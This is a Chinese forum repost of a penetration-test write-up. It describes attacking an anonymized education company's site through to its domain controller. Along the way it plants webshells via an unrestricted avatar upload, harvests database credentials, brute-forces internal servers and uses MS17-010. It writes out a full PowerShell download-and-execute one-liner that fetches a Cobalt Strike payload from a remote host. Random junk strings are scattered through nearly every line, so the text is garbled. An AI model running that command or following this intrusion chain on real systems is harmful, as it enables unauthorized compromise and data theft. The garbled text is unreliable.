找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2216|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

o& b! M0 `* B( a 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 & o z! I3 O. {% n" [6 m3 p, v1 e, y

* B( |# Y7 t1 H: ^3 W8 a

5 Q6 C8 p1 V4 o( M! S: I   # u6 _5 H! C4 m- ]# W7 D2 r

- t* Q' O; m. b3 o3 K' W4 _

4 \& Q5 U: p6 s* e 正文 ! h$ S5 @7 ^; I! K: T

9 W' K% O; u/ N

7 `9 P) ]1 T; |( s/ R6 _# S  , B$ L$ c1 g3 t1 [

8 N! \" s6 P6 K2 D0 _

m Q: C) I/ G* b' d 目标:www.xxxx.com(一家教育机构)
% M6 H, d% K/ C( t0 n
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
3 K6 m+ ]& s4 O$ n- A W, ^7 l3 i9 `5 A

+ |3 L! \9 H% r' X5 \

5 G, E! G+ j. _) p# s vshapes= 2 a: N! F' w& R

5 u% r- n5 W% z3 M

5 s) Q# O- A4 B/ x3 B 进行了简单的信息搜集
* C7 b- c# d9 E) b( r
/ u. J* @6 I1 b7 G3 b! t# n
! j" m5 G8 J* m n7 l) K0 f5 P6 [5 u

8 X, t6 A8 ?6 O% y# O( j% u3 l* r

% v6 X, Y& o9 G 子域名搜集 $ b! `, E3 c+ V% W

! }9 K3 y \ }: L1 |& d: ?

- v U" u! p# ~; f- ^$ z vshapes=) T, i; ]) I3 F: O4 g. O& F( M

8 X# `1 {+ ]* ]! s3 Z* {, ]! M

0 L# B7 U M0 v, v, u fofa找资产
9 f l+ D4 l7 A. F& x! v" z
" ` h( ~! b5 s/ B6 e/ D' K
8 {4 `/ y! Q7 I2 Y

4 X0 S$ k5 a* | `* k

3 Q8 R0 C' x: K: F# j3 l$ y3 j vshapes= c V6 z, t, r

, s) K% l) l* A. v+ R

" S2 X1 m' [" \, J B 一共七个资产。去重之后只有两个。
6 C* ]/ t2 d L1 S+ e% ]) H! \
& L/ l! z3 J) `3 D3 j
U8 f; r3 ~4 v1 S3 q

- C7 G/ T: M. Z# i

( k D @, I0 \5 v 目录探测 7 \2 F u+ ?% o4 l

- v& Z" T: |7 k( S( _. v* E

% _: C3 a) A( b" t/ f& Z5 z vshapes= 2 K) k& k: U5 J5 E

" p5 n3 v. \2 O' m+ a( N

3 V4 F8 M; h7 g% w 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
# q" W; ?. y; U* @
$ `+ h+ w' U3 T' Q, o) H- \- m% Z
* q5 S/ M% O9 _4 ]" C9 p/ Q( s

2 J7 [# o. k; P; T9 t% {3 Q& i) l9 D

" d; U+ [; P* D8 R 我又尝试了通过修改返回包来绕过登录界面6 c+ t, B9 l0 @+ z( p$ ^8 w$ t

% y% V& [7 K+ t; g. Z: t R& |5 F

8 B5 k9 O6 e, W vshapes= 4 Q& w& s2 H+ d. f

o6 f; B+ j% _

& a+ A0 J, G; i% {4 v5 a. g- t 还是不行,尝试注入无果 F: ~# b2 Y; s- i: R8 D

2 y9 `5 q; }8 ^+ ~

* j7 ]( Y8 {, @1 q vshapes= # C- M! ?- v- g) q6 |1 b" U1 b

9 G+ N* [6 M$ _. ~

1 R( ~* g: ?# W# ? 不过我目录探测出了一处Spring信息泄露
+ W4 B4 _+ X& `3 D c& N
0 J O8 g1 ]: F8 @; z h6 l
# H X' l$ y: i0 U

) ]7 \/ i) H9 z/ Y- W3 d* e. r

6 Y: l3 e" r+ B& X1 ?- F1 n vshapes= # h; H: |3 o% t2 D* f7 }

9 a) A7 \: d3 p& Z) @

) U' k, y( U- n) j' y 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 v) a6 ?: z/ E j

+ w& A0 T+ d" H) e

7 y& O! E+ P: k T- ~, h vshapes=, R- S \& k' T- y8 w1 ~

# O, E3 I! {( K4 h

' W# o0 K8 I6 v) p 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 & Q, X: ^$ p! b

/ y1 a. I& _3 c

2 }& F4 b# R5 w; s* z vshapes= % a7 Q, l B0 E* H

/ |7 X/ A, x! |8 }

( }0 d9 r* I0 @# A' ^2 T 获取有些师傅到这一步就手机抓包电脑测了。; N9 X" m' n0 \8 d+ [: y

8 a& d4 ?9 _) Y; W

& T* f1 A& m/ g% |2 o Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 ' ?9 g$ r& Y5 l6 z- h I

/ [' q$ H: q& c' C* \" o

! g' Z2 M. n7 I4 | C$ \) q( { 其中在一个公众号发现了小程序,可以进行注册。2 K- |9 p% M$ c# M+ @1 Z6 A

' {. U$ p* T! s! m! i' z

5 y$ O; m: G3 f* H" ? 看到了头像上传,尝试上传获取WebShell # N5 {0 u8 o z2 }

; D$ h p N; W/ [, R

: B/ m1 K+ r8 e" e3 z$ E% F3 h vshapes=$ I+ v# G5 m6 H2 g4 y

4 G8 H# L! h' { d8 |! G( I

! H8 t2 r. P7 P ^! D 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问; C7 n- k* l7 l) v- x% W) F% o

, m4 r" N/ m% ^4 o, T0 p

- S+ ~* |* c. c9 |' j- r$ z vshapes= 9 L1 n& s$ E2 m8 a

5 m; w3 }8 d- S+ }7 z

: |' ]0 ]# K% n, d/ S; B 然后上了大马 4 S+ ^) N& k1 F" N3 S# g3 F6 O: o$ j

: I7 T6 |7 s: C8 i6 |! g9 Y* a! A

% Z, h6 T1 j: ^' K! M P e vshapes=2 q& i6 w" V, Z( p

- g: Q4 q- P6 T

! S$ h4 m t& _2 \0 C0 P# w2 h2 H vshapes= * e- @" N/ B0 Q0 w( G: y$ p3 Q6 [) f

5 |+ L( y! \3 F' }; \1 o y

/ Q( h6 _; ~" y% T9 A* ^. k 通过翻找文件发现数据库账号密码. F; [- o W4 |* `0 K- U# P

# G; c3 A! P/ u, Y) t( [

. w" u& L' R+ b vshapes=$ Y; p' ?: p0 B U* r: U# O5 ~; ?

4 w3 t+ X+ |) m: V$ W& }

: l- L7 ]3 B9 D --内网渗透 b i: Q5 |/ B

! ]/ o7 k* {& Z& c! V

! T% z7 y M& g3 |# m( |2 V9 O 直接通过powershell执行 cs上线. S/ @* h* W9 b6 ~

2 x( n: s0 } ~

, s4 i2 b8 B7 i1 C, A powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"0 ?! p1 {3 ?9 [" f

: Q1 E+ W1 H& r: d, L$ j* w: X

$ n7 Q- X0 f ^- H" ] vshapes=8 P j- b5 V6 e2 e4 K Z _5 p- x

) r0 s _* ]" M! P4 Z" c q

( ]8 W5 \' G. {$ R# a6 Q7 Y9 |$ l 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 , V" m) Z, W+ r5 D

! Z; w. t' t; N7 h& ]+ l3 a

# U4 r+ E R# X9 m0 P vshapes=1 t: X" w1 E/ V% i- g+ M1 A* V- U

4 J- }( ]/ H* A2 b+ `9 b. k, [

+ E/ F! _! ?/ y K4 K- ~3 g% p" J1 [ 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
- {- [. a x. `7 z0 g& y
6 M) a- C- u6 p, l4 t3 M B- U
' P6 G6 s f J" e |) H6 d
3 h3 J& G1 [) r* t5 y% D4 p2 w1 o3 L

7 u/ E: V5 s$ g" \8 j$ {" D

' R2 x+ P9 T2 {4 _% I' ^ vshapes=) e$ m, o4 E7 e4 T7 `+ S

; _8 c1 \1 Z% v, ^1 B2 R, v

& B, U" k& V; G3 g2 t' W 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
* B* N P5 Y, _
B6 P. ~* k5 u+ C8 |. J: P) L
6 k8 Y8 j | N; ?- G

- S' s1 w& a; D1 k1 J8 k

; g; l0 {+ j- g# n9 c8 \$ | vshapes=; d; L/ Q6 v5 W- ~

$ {0 s0 Q1 E% M5 Z

$ M+ ]% E# _ m& `/ ]
% z9 c# }" f& r5 K
2 r% e* i! H2 ^: l |. N5 v
/ M5 x4 O, Q; S) N8 I- U9 x

+ R7 { E8 R" L2 f/ Q

, C- b: `% Q4 V   4 {* `0 U7 @, @+ @; j6 g' l

% K, t+ Q) ^, `# m: B

5 }* F0 K. u7 k" \8 d: |) l 小结# }- s O( W* s k2 C4 W

1 S2 }2 D( @8 X4 D% F. [/ D- S6 l: j

8 [0 x& \* V) O& _; x$ o4 z  ; I* V! [) i( U5 [

6 H0 A2 u, Q3 m' i" C

9 u( D1 U+ g; H( u- W1 @ 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! ' X% e) ]. g W5 ~- h y3 `( x( y

5 u8 ~& V. N. D6 \5 Z4 o- ?

0 k; n; ]8 }" E   7 T. B2 b5 K6 h& @# ^% \$ x) \

* X" P1 e. a3 F' @ A
    , s {. b2 d# b0 b% Y( A6 y
  • + o/ t: V( l6 G( x U7 Z d; z  6 n1 e) y1 f% I! J- s2 _% c
  • ' ~, R% X# Q/ S0 Y" h; w9 [
  • 5 |( O, ~ j4 i% j4 w4 X   7 A* O* t: P( O5 S
  • 9 T" I. x5 P, m: |
b' v! Q: ^* ^+ U3 u

7 m1 z) A, L- C+ Z6 r 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html1 b- a; O3 Q9 ?- U" y q5 U

2 a/ S5 h4 g5 q, P! N

- G/ u; G" J1 ?: I  % U7 p1 e1 w( n# J0 B. p8 v K

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表